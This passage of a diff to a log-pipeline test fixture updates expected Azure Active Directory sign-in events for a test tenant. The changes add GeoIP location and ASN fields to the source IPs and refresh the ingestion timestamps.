"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:54\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d39944c4-6766-4a89-8d5a-c789175830ee\",\"InterSystemsId\":\"425503c9-ccbf-4674-8f1e-4d56510474fd\",\"IntraSystemId\":\"57ef1056-6ce2-424a-b241-ce3939d00900\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -1802,6 +1982,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -1882,7 +2074,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970152300Z", + "ingested": "2021-12-14T14:49:08.047405391Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"6f2b7716-1acc-450d-ae13-afad7e02d07e\",\"InterSystemsId\":\"4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f\",\"IntraSystemId\":\"0c8fcffc-a810-4a85-b8e2-3a2fda925c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -1922,6 +2114,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -2002,7 +2206,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970156200Z", + "ingested": "2021-12-14T14:49:08.047406205Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"47f3c440-3fb7-4b5e-9c20-455470b289d2\",\"InterSystemsId\":\"4542ce7e-270b-435e-8f81-ee23ea74be75\",\"IntraSystemId\":\"9718abaa-220e-49c5-8c9b-588d32b8db00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -2042,6 +2246,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.14" }, "tags": [ @@ -2122,7 +2338,7 @@ "ip": "67.43.156.14" }, "event": { - "ingested": "2021-12-09T13:42:12.970160100Z", + "ingested": "2021-12-14T14:49:08.047406912Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:38:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"5a3435d0-229a-41c8-bd21-b4f2b662d0f6\",\"InterSystemsId\":\"4836e306-1460-4f34-ab55-a74c9a14f50d\",\"IntraSystemId\":\"2fde8302-c39e-40b6-9c7f-1bb9d4800a00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -2162,6 +2378,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2242,7 +2470,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970163400Z", + "ingested": "2021-12-14T14:49:08.047407517Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"5aff2d1c-b203-46a6-96f0-b8f908f0e968\",\"InterSystemsId\":\"4a50a549-adf3-4a22-9037-7fd8cd3d0116\",\"IntraSystemId\":\"1d856a16-b179-41ab-9c0d-af1d2b925100\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -2282,6 +2510,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2362,7 +2602,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970167700Z", + "ingested": "2021-12-14T14:49:08.047408141Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3d8033cf-eecd-4eee-87a5-795efd8a1d3d\",\"InterSystemsId\":\"4e44a55e-9c0d-4cea-b000-1b79e96dcf57\",\"IntraSystemId\":\"fc33c54e-38b9-4ef2-a4ee-a3a324a45500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -2402,6 +2642,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -2482,7 +2734,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970173200Z", + "ingested": "2021-12-14T14:49:08.047408885Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8bd0a250-74f6-4eeb-ba20-c5bdbd977013\",\"InterSystemsId\":\"4e91c3e1-819e-4ebc-ae68-2037cfc2db92\",\"IntraSystemId\":\"a063e495-5883-4837-8186-5828f9f2d500\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -2522,6 +2774,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2602,7 +2866,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970178600Z", + "ingested": "2021-12-14T14:49:08.047409423Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"08e18876-6177-487e-b8b5-cf950c1e598c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558\",\"InterSystemsId\":\"50d648cb-466d-4cf4-b2f8-3b7e84f47040\",\"IntraSystemId\":\"64613cae-510d-4a52-b486-070b775e5800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -2642,6 +2906,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -2722,7 +2998,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970184500Z", + "ingested": "2021-12-14T14:49:08.047410027Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"19d57a4a-d32e-4dc6-971f-3491bc440023\",\"InterSystemsId\":\"5a453031-0cc3-4577-a589-4c3bf37eed78\",\"IntraSystemId\":\"814a32f0-27fd-4e82-855c-13da15a4c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -2762,6 +3038,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2842,7 +3130,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970190400Z", + "ingested": "2021-12-14T14:49:08.047410746Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"0b158f74-e223-43c8-9cfd-5f4442f29fc7\",\"InterSystemsId\":\"5cd6215d-e206-4c3f-805d-6e386cbdab7a\",\"IntraSystemId\":\"9c218a27-ed51-4011-8383-e76850e85000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -2882,6 +3170,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -2962,7 +3262,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970195900Z", + "ingested": "2021-12-14T14:49:08.047411386Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4819a0c2-2050-4549-ab66-f5b90cbbcc5a\",\"InterSystemsId\":\"612b339f-1088-a000-f25f-9c8af4d57894\",\"IntraSystemId\":\"c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -3002,6 +3302,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -3082,7 +3394,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970201500Z", + "ingested": "2021-12-14T14:49:08.047412039Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:29\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e94002d9-f6e8-46f9-8702-2a29e908e73d\",\"InterSystemsId\":\"61eb5713-2687-4c00-a7b2-fde4788c395b\",\"IntraSystemId\":\"3db9a461-6dd1-4950-b3e3-fbe8c2d5c700\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -3122,6 +3434,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -3202,7 +3526,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970207100Z", + "ingested": "2021-12-14T14:49:08.047412588Z", "original": 